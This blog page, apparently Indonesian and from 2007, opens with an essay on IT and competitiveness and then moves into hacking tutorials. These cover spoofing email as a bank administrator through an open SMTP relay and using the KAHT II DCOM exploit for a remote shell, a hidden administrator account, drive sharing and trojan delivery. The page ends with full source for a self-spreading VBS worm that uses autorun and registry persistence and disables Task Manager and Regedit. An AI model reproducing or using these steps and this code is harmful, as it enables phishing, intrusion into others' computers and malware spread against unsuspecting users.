Jumat, 06 Juli 2007

Gambaran Sederhana Menjadi Terbaik Bertumpu IT (Onno W. Purbo)


Menjadi yang terbaik adalah cita-cita mereka yang hidup dalam dunia yang sangat kompetitif. Bagi mereka yang hidup biasa saja, biasanya mengimpikan paling tidak menjadi lebih baik daripada apa yang ada sekarang ini. Sebuah impian & cita-cita yang sangat manusiawi, para mujahiddin mungkin pengecualian – mereka mempunyai impian yang lebih tinggi daripada sekedar terbaik duniawi.

Banyak hal yang mungkin dilakukan untuk mewujudkan cita & impian tersebut, sekolah & menuntut ilmu merupakan pola paling konvensional untuk meraih cita. Bagi dunia usaha yang sangat kompetitif, selain kepandaian / penguasaan pengetahuan tentunya harus di dampingi dengan ke trampilan, kecekatan-an, effisiensi proses usaha di samping tentunya kemampuan untuk penguasaan pasar / medan melalui berbagai cara / teknik.

Secara sederhana dapat di rangkumkan bahwa ada tiga (3) hal utama yang akan sangat membantu kita untuk menjadi yang terbaik, yaitu, (1) pandai, (2) effisien, dan (3) pemimpin yang menguasai pasar / medan. Pertanyaan selanjutnya, apakah mungkin ke tiga (3) faktor utama ini dilakukan menggunakan / bertumpu pada teknologi informasi? Jawaban singkat-nya adalah “Dapat!”, bahkan jika anda cukup pandai maka seluruh proses bertumpu pada teknologi informasi akan jauh lebih effisien & murah di bandingkan dengan menggunakan metoda konvensional. Mari kita tela’ah lebih jauh berbagai konsep ril yang bertumpu IT yang memungkinkan kita bisa menjadi yang terbaik.

Menjadi lebih effisien merupakan strategi standar di dunia usaha & pada saat ini telah banyak di implementasikan. Contoh sederhana adalah di bidang finansial & accounting perusahaan (yang sudah sejak lama berkenalan dengan komputer), effisiensi bergerak ke Management Information System (MIS), yang di integrasikan dengan berbagai unit dalam perusahaan / institusi menjadi Enterprise Resource Planning (ERP), dan tidak lupa mempertajam ujung tombak untuk menembus & meng-create pasar menggunakan peralatan bantu seperti Customer Relationship Management (CRM). Dengan berbagai tools di atas, maka mekanisme internal sebuah institusi / badan usaha di mungkinkan untuk menjadi lebih effisien. Tentunya perlu di ingat bahwa amat sangat naif jika kita membeli peralatan / tools di atas tanpa menyiapkan Sumber Daya Manusia (SDM) di institusi / perusahaan agar dapat bersinergi secara optimal dengan dunia IT yang sangat maya & effisien. Mengubah paradigma berfikir & budaya manusia akan menjadi tantangan terberat dalam menginjeksi teknologi ke sebuah institusi / perusahaan (belum terhitung masalah palak memalak & korupsi jika hal ini dilakukan di instansi pemerintah).

Untuk menunjang transaksi usaha antar institusi / badan / perusahaan, kita pada hari ini mulai diperkenalkan dengan berbagai konsep tentang e-commerce, e-business, e-marketing, e-dll.Pada dasarnya ada dua (2) teknologi yang menjadi motor proses transaksi online tsb. Teknologi yang paling mendasar adalah teknik keamanan / network security. Tanpa ada rasa aman / jaminan ke amanan maka sulit sekali untuk memperoleh kepercayaan (trust) dari semua pelaku / pemain yang ada. Tanpa ada kepercayaan (trust) maka akan sulit untuk mengharapkan terjadinya transaksi. Network security sendiri dapat di implementasikan dalam bentuk firewall, maupun berbagai teknik untuk membuat terowongan yang aman melalui Internet menggunakan protocol seperti SSL. Teknik authentikasi yang dapat menjamin keabsahan si penerima / pengirim menjadi penting sekali, implementasi dalam bentuk Certificate Authority, Registratin Authority, & Public Key Infrastructure menjadi sebuah standar pada hari ini. Teknologi ke dua yang menjadi sangat strategis adalah teknik transaksi online, teknik yang paling sederhana adalah Electronic Data Interchange (EDI), yang kemudian berkembang di kemas oleh XML, WML dll. Semua di mungkinkan dengan dukungan teknik database yang kuat di belakang-nya.

Selain effisiensi, menjadi pandai merupakan strategi konvensional untuk menjadi yang terbaik. Konsep pemandaian berbasis IT telah banyak di kembangkan, mulai dari yang sederhana seperti Computer Based Learning, Computer Assisted Instruction (CAI), hingga yang lebih kompleks seperti pendidikan jarak jauh, distance learning, dan akhir-akhir ini yang tampaknya lebih dominan, yaitu Knowledge Based Management (KM). Gilanya, beberapa rekan seperti Knowledge Management Research Group (KMRG) di ITB yang di pimpin oleh Sdr. Ismail Fahmi melepaskan software digital library-nya secara gratis di http://gdl.itb.ac.id. Dengan adanya knowledge infrastructure yang saat ini mulai beroperasi, konsep-konsep pembelajaran yang biasanya teaching based & sangat sentralistik kepada figur guru & dosen menjadi kadaluarsa. Kurikulum nasional DIKNAS menjadi usang & lebih baik di tinggalkan saja. Konsep learning based menjadi lebih dominan, guru / dosen menjadi fasilitator saja.

Implementasi Knowledge Management di perusahaan akan mendorong competitiveness si perusahaan / institusi. Knowledge sharing di fasilitasi untuk kepentingan competitiveness institusi, yang pada akhirnya menjadikan institusi tidak hanya baik dalam effisiensi menjual servis ke masyarakat, tapi juga sebagai knowledge producer yang akan mendorong terciptanya pasar, demand & image di masyarakat akan kekuatan institusi tersebut. Knowledgeable leader merupakan typical leader di masa mendatang, seorang birokrat, administrator, manager hanya akan berada di belakang layar yang berfungsi mengeffisienkan kinerja institusi / perusahaan. Hanya knowledgeable leader yang akan berada di depan, di ujung tombak perusahaan / institusi dan mengarahkan si perusahaan menuju jalan yang lebih competitive & memenangkan kompetisi. Interaksi dengan masyarakat menjadi sangat penting sekali, kita tidak bisa hanya memberikan servis ke masyarakat / customer saja, edukasi, sosialiasi & interaksi dengan masyarakat akan memegang peranan penting untuk membangun komunitas yang berkiblat pada apa yang kita cita-citakan bersama. Kepiawaian si knowledgeable leader untuk menjadi public figure / public relation yang baik akan menentukan keberhasilan secara keseluruhan. Pertempuran tidak mungkin dimenangkan oleh mereka yang hanya effisien saja, hanya mereka yang effisien & smart yang akan menjadi pemenang.

Tampaknya sulit? Ah tidak juga. Pengalaman di lapangan menunjukan bahwa kunci utama dari semua ini adalah kemauan & keihlasan untuk berinteraksi, bersilaturahmi dengan sesama, dan ihlas men-share pengetahuan yang dimilikinya. Keaktifan untuk menjawab pertanyaan, memberikan komentar yang smart di berbagai mailing list Internet, dan masuk secara smart ke berbagai media menjadi kunci utama-nya. Proses ini berlangsung tidak dalam 1-2 hari saja, tapi dalam perioda lama beberapa bulan & tahun. Hati-hati, masyarakat / khalayak umum yang akan menilai anda di media Internet & media massa, bukan komisaris, pegawai & owner perusahaan anda. Masyarakat sangat kritis & terkadang sarkastik dalam menilai seseorang di media publik. Knowledgeable leader adalah mereka yang berhasil menggerakan publik & survive dari kawah Candradimuka publik di atas.


Kamis, 05 Juli 2007

hemmpphhh

Okay server SMTP tau kan???? Apa lagi tuh??? SMTP (Simple mail Transfer Protocol), yaitu server yang mengatur keluar masuknya email .. SMTP ini menggunakan port 25 untuk pertukaran data ... okay sekarang mulai aja caranya yah ...

1. cari pakai angryIPscanner host yang port 25 – nya kebukak ...
2. Kemudian lakukan telnet ke sana, misalnya saja, server yang mempunyai port 25 IP address nya adalah 200.123.456.78, maka ketik aja perintah berikut:

Telnet 200.123.456.78

Kemudian tekan enter,

3. Kemudian ketik alamat pengirim , misalnya pengirimnya admin@banksange.co.id , maka ketik :

MAIL FROM: admin@banksange.co.id

Kemudian tekan enter

4. Setelah itu alamat penerima, misalnya korbannya gueh .. cukup ketik ajah:

RCPT TO: nighttalkerz@yahoo.com.au

Kemudian tekan enter

5. Lalu ketik isi email nya, yaitu dengan menggunakan perintah:

DATA

[Isi email]
.

Untuk mengakhirinya ketik ’.’ tanda titik dan tekan enter 2 kali ...

Jika email terkirim, maka akan ada keterangan

250 ok 1176476098 qp 4048

Masuk Komputer Orang, Via Jaringan Lokal.... Menggunakan DCOM

Yang dimaksud DCOM exploit disini adalah kaht,Langkah pertama yaitu download program kaht ii terlebih dahulu (search pakek google) letakkan di directory sesuai dengan keinginan anda, biasanya bentuk file dalam Zip coba extract file tersebut setelah ter exstrack kaht bisa digunakan.

Selanjutnya tentukan alamat ip target misal : 192.168.0.12

selanjutnya : Kaht 192.168.0.11 192.168.0.12

keterangan :

192.168.0.11 adalah IP (komputer tagret) awal

192.168.1.12 adalak IP (komputer target) akhir

karena disinia kita akan mengexploitasi ip 192.168.0.12 kita gunakan kaht 192.168.0.11 192.168.0.12 karena ip 192.168.0.11 merupakan range terkecil agar exploitasi berjalan lebih cepat sesuai dengan target kita.

Jika komputer target berhasil di exploitasi maka akan muncul akan muncul tampilan kurang lebih sebagai berikut :

------------------------------------------------------------ ----
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION Smile AUTOHACKING
------------------------------------------------------------ ----
[+] Targets : 192.168.0.11-192.168.0.12 eith 50 Threads
[+] Attacking Port. Remote Shell At ports: 36388
[+] Scan in Progress....
- Connecting to 192.168.0.12
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...

Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.

c:\WINNT\system32>

Sampai disini kita sudah berhasil masuk ke komputer target dan kita berada di directory kerja c:\WINNT\system32>

Sampai disini terserah anda mau malkukan apapun, sesuai keinginan anda disini kita akan coba malakuakn sharing file dan membuka file sharingan tersebut di komputer kita dengan terlebih dahulu menambahkan user ID setingkat administrator.

Untuk melakukan penambahan user di pc Target

C:WINNTsystem32>net user paluared suck /add
^ ^
nama_user password_user
net user paluared suck /add
The command completed successfully.

ket : disini kita menggunakan perintah net user nama_user password_user /add berdasarkan perintah diatas kita menambahkan user paluared dengan password suck, setelah user berhasil dibuat selanjutnya kita memberikan autority pada user paluared dalam groups administrator

C:\WINNT\system32>net localgroup Administrators paluared /add
^ ^
nama_group nama_user_baru
net localgroup Administrators paluared /add
The command completed successfully.

ket : di atas kita menggunakan perinta net localgroup Nama_gorups nama_user /add berdasarkan perintah diatas net localgroup berarti kita menambahkan user paluared kedalam groups daministrator pada kumputer local (komputer target), administrators adalah grups dari administrator tersebut dan untuk paluared adalah nama user yg ditambahkan dalam gruop
administrator.


setelah masuk coba lo buat user groups administrator

C:WINNTsystem32>net user paluared such /add
^ ^
user password

setelah itu masukan user paluared ke groups administrator

C:WINNTsystem32>net localgroup Administrators paluared /add

setelah itu sharing drive-nya

C:WINNTsystem32>net share c=c:

catatan user id nya terserah lo kasih apa sesuai keinginana lo..
oh ya

untuk menggunakan sharing drive tersebut bisa gunakan perintah net use

pertama buka dos promt baru di komputer kita selanjutnya ketik berikut:

c:> net use * \\ip_address\drive_c * /u:paluared
Type the password for \\ip_addres\C: <--- masukan password disini


ket : berdasarkan perintah diatas IP_address adalh IP komputer target dan drive_c adalah nama sharing drive dari komputer taget dan untuk u:/paluared bahwa kita masuk dengan menggunakan
user paluared (biasanya di dalam winxp/win2000 terdapat sharing
defaultnya yaitu C$, d$ dst, jika ini sang admin belum merubah hal tersebut kita dapat langsung melakukan net use atau tanpa malukan net share berdasarkan default sharing ini )


cat IP-Addres bisa juga di isi dengan nama computer
untuk keterangan nya lo bisa baca manualnya net use /?
setelah berhasil bisa liat di windows explorer


C:\WINNT\system32>net share drive_c=c:
^ ^
nama_sharing drive_sharing
net share Drive_c=c:c was shared successfully.

ket : berdasarkan perintah diatas kita melakukan telah sharing drive yaitu drive C dengan memberikan nama drive_C


TAMBAHAN : JIKA KITA SUDAH BERHASIL MELAKUKAN SEPERTI APA YANG DILAKUKAN DIATAS MAKA UNTUK SELANJUTNYA ANDA BISA BERKREASI SENDIRI DENGAN APA YANG ADA DI PIKIRAN ANDA.......

CONTOHNYA : KIRIMKAN FILE TROJAN, DAN KEMUDIAN JALANKAN HANYA DENGAN MEMANGGIL FILE TERSEBUT.....

DAN JIKA FILE TROJAN SUDAH AKTIF, MAKA JALANKAN CLIENT TROJAN TERSEBUT... DAN JIKA SUDAH.....

SELAMAT........ KOMPUTER KORBAN SUDAH MENJADI KEKUASAAN ANDA.

history of hacker

Hasil daripada usaha mencari di ejen-ejen carian dapatlah membuktikan bahawa budaya menggodam ini telah muncul pada sekitar awal tahun 1960an di mana penuntut-penuntut Massachusetts Institute of Technology (MIT) telah menghasilkan 'PDP-1' super computer.Mereka merupakan kumpulan perintis (pioneer) kepada perkembangan teknologi komputer dan mula beroperasi dengan menggunakan komputer 'mainframe' ,iaitu komputer yang mula-mula sekali digunakan untuk tujuan menggodam (hacking).Budaya ini kemudian merebak lebih jauh sehingga tahun 1969, iaitu tahun pertama ARPANET.

Artificial Intelligence (AI) Lab di Massachusetts Institute of Technology (MIT) sering disebut sebagai pusat utama menggodam pada sekitar tahun 1971.Perkembangan Editor Emacs juga berlaku di Lab AI dan telah dipelopori oleh Richard Stallman,seorang tokoh komputer yang mempelopori Software GNU dari Free Software Foundation (FSF).

Perkembangan teknologi komputer bertambah pesat seiring dengan kemunculan ramai penggodam-penggodam di US.Di New Jersey,Ken Thomson dari Bell Laboratories telah mengubah tradisi dunia menggodam dengan penghasilan UNIX.UNIX merupakan aplikasi sistem komputer yang dikatakan sungguh canggih dan mampu untuk membina dan mencipta program.Dennis Ritchie,seorang perintis program,telah mencipta bahasa program yang terbaru yang dipanggil 'C' untuk digunakan di bawah peringkat permulaan perkembangan UNIX milik Ken Thomson.Dan hasilnya,kedua-dua sistem ini amat fleksibel dan mudah untuk digunakan oleh sesiapa sahaja (user-friendly).

Usaha Linus Torvalds (Perintis LINUX, Ogos 1991) pula telah menarik minat penggodam dan secara tidak langsung membantu beliau membangunkan LINUX - 'full-featured' UNIX yang percuma,disebut sebagai 'OpenSource'.LINUX menggunakan standard POSIX dan dibangunkan oleh beratus-ratus pengaturcara (Programmer) di seluruh pelusuk dunia.Jenis-jenis pengagihan (Distro,distribution) LINUX antaranya ialah RedHat Linux, Debian, Slackware, SuSe, Corel dan lain-lain lagi.

Kategori Hacker

Elite - Peringkat yang begitu memahami sistem operasi luaran dan dalaman, banyak mengkonfigurasi dan menyambungkan jaringan secara global, sentiasa mencipta program baru setiap hari, lebih bersikap efisyen dan berketrampilan dalam setiap keadaan. Menggunakan kemahiran yang dimiliki dengan cermat dan teratur. Mereka amat mahir dalam pelbagai jenis keadaan.

Semi Elite - Melihat daripada nama kita sudah mengetahui bahawa mereka golongan awal sebelum sampai ke peringkat Elite. Mempunyai pengetahuan yang baik tentang bidang komputer, mengetahui sistem operasi dan cabang-cabang yang wujud serta mampu mengubah program untuk digunakan dirinya sendiri (exploit).

Developed Kiddie - Pada peringkat ini,mereka boleh dianggap masih berada dalam tempoh mencuba sendiri.Mereka masih baru dalam mempelajari prosedur menggodam serta mencuba pelbagai sistem mahupun program sehingga berhasil.Mereka yang berada dalam peringkat ini masih menggunakan Graphic User Interface (GUI) dan baru berjinak-jinak dengan asas UNIX.

Script Kiddie - Mempunyai ciri-ciri Developed Kiddie dan mempunyai pengetahuan tentang teknik rangkaian (Networking) yang sangat minima.Mereka yang berada dalam golongan ini tidak mampu melepasi GUI dan menggunakan Trojan yang banyak menyukarkan sebahagian pengguna internet.

Lamer - Mereka dalam golongan ini tidak mempunyai kemahiran, pengalaman atau pengetahuan tetapi ingin mencuba menjadi seorang penggodam dan sering digelar 'wanna-be'. Mereka biasanya digolongkan sebagai seorang yang banyak menggunakan komputer dan teknologi untuk permainan (games), Internet Relay Chat (IRC), mencetak rompak aplikasi (software), mencuri kod, juga menggodam menggunakan Nuke dan Dos.

Berdasarkan kategori-kategori di atas, anda berada di mana?

Jadi, adakah anda rasa penggodam adalah seseorang yang sering melakukan kejahatan di dalam dunia internet? Fikir sebaik-baiknya.

virus via notepad (by NIghtTalkerz)

Iseng-iseng mencolok Flash Disc saudara saya tiba-tiba saya nemu sebuah malcode lokal yang dibuat dengan bahasa VBS. Wah, ternyata para virus maker mulai melirik memakai bahasa VBS. Mungkin karena menyangkut HAKI (Hak Atas Kekayaan Intelektual) karena VB6.0 yang banyak beredar adalah bajakan. Jadi ia membuat virus dengan VBS yang bisa dibuat hanya dengan Notepad karena di Windows sudah ada compiler yang terintegrasi dengannya, Windows Based Script Host.

(tulisan ini hanya bertujuan untuk memperkaya ilmu)
Virus ini saya beri nama “NightTalkerz.VBS”. Sekarang buka Notepad-nya. Copy kode berikut :

----------------------------------------------------------------------------------------------------

'//--Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus--//
on error resume next

'//--Dim kata-kata berikut ini--//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

'//--Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information--//
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe NIghtTalkerz.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

'//--Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\batch- NightTalkerz.dll.vbs ")
tf.attributes = 32
set tf=fs.createtextfile(windowpath & "\batch- NIghtTalkerz.dll.vbs",2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & "\batch- NightTalkerz.dll.vbs ")
tf.attributes = 39
'//--Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok--//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
'//--Cek Drive--//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

'//--Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\--//
set tf=fs.getfile(flashdrive.path &"\NightTalkerz.dll.vbs ")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\NightTalkerz.dll.vbs ",2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &"\NightTalkerzdll.vbs ")
tf.attributes = 39

'//--Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)--//
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next

'//--Manipulasi Registry--//

set NightTalkerz = createobject("WScript.Shell")

'//--Manip - Ubah Title Internet Explorer menjadi Night Talkerz Communications--//
NIghtTalkerz.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title"," NIght Talkerz Communications "

'//--Manip – Set agar file hidden tidak ditampilkan di Explorer--//
NIghtTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden", "0", "REG_DWORD"

'//--Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager--//
NIghtTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
NIghtTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD"
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD"

'//--Manip – Disable klik kanan--//
NightTalkerz.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"

'//--Manip - Munculkan Pesan Setiap Windows Startup--//
NIghtTalkerz.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "Worm NIghtTalkerz. Variant from Ambar Cahyo Nugroho, don’t panic all data are safe."

'//--Manip – Aktif setiap Windows Startup--//
NightTalkerz.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- NightTalkerz.dll.vbs "

'//--Manip – Ubah RegisteredOwner dan Organization--//
NightTalkerz.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "The Batrix"
NightTalkerz.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","Night Talkerz"

'//--Nah kalau kode dibawah ini saya nggak tau, tolong Mas Hosni atu sapa sajah untuk menjelaskan--//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
'Akhir dari Kode

thanks to NightTalkerz